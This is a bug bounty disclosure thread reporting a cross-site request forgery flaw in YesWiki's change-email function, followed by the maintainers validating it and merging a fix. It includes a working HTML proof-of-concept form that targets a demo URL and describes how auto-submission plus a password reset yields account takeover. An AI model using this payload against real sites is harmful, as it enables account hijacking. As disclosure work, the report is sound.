Cross-Site Request Forgery (CSRF) in yeswiki/yeswiki

Valid

Reported on

Dec 6th 2021


Description

Hey all,

so i found that YesWiki doesn't implement any sort of anti-csrf mechanism, i found that the change email function is vulnerable to CSRF attacks which leads to Account Takeover.

Proof of Concept

<html>
  <body>
    <form method="POST" action="https://yeswiki.net/cercopitheque/demo/?ParametresUtilisateur">
      <input type="hidden" name="usersettings_action" value="update"/>
      <input type="hidden" name="email" value="testerhacker@gmail.com"/>
      <input type="hidden" name="revisioncount" value="20"/>
      <input type="submit" value="Submit">
    </form>
  </body>
<html>

Exploitation Scenario:

  • An attacker sends the above PoC to the victim.

  • rather than submit, the autosubmit attribute could be implemented, so the victim's email will be changed and he will be redirected to a third site.

  • an attacker now will reset his password via the changed email and he will be able to takeover the account.

NOTE: the attack could be applied to the admin account user which could be harmful to other users leading to compromise their confidentiality, integrity and availability.

Remediation Actions:

Implementing a anti-csrf AND/OR anti-csrf header with server-side checks should be sufficient to resolve the root cause of the issue.

Impact

Taking over user accounts.

Best Regards,

Moad

We are processing your report and will contact the yeswiki team within 24 hours. 6 months ago
Moad Akhraz
6 months ago

Researcher


hey @maintainer, we can work on a fix if you want, please ping me using @researcher.

Thanks,

Moad

We have contacted a member of the yeswiki team and are waiting to hear back 6 months ago
We have sent a follow up to the yeswiki team. We will try again in 7 days. 6 months ago
Jérémy Dufraisse validated this vulnerability 6 months ago
Moad Akhraz has been awarded the disclosure bounty
The fix bounty is now up for grabs
Moad Akhraz
6 months ago

Researcher


Hey @admin, i think that a CSRF that leads to Account Takeover deserves more than $5 ??

Jamie Slome
5 months ago

Admin


Hello @mdakh404, I would recommend creating an issue on our public roadmap where you can share your thoughts!

Moad Akhraz
5 months ago

Researcher


Hello @j9rem, can you please deploy a fix for this one ?

Jérémy Dufraisse confirmed that a fix has been merged on f72309 3 months ago
Jérémy Dufraisse has been awarded the fix bounty
usersettings.php#L119-L127 has been validated
to join this conversation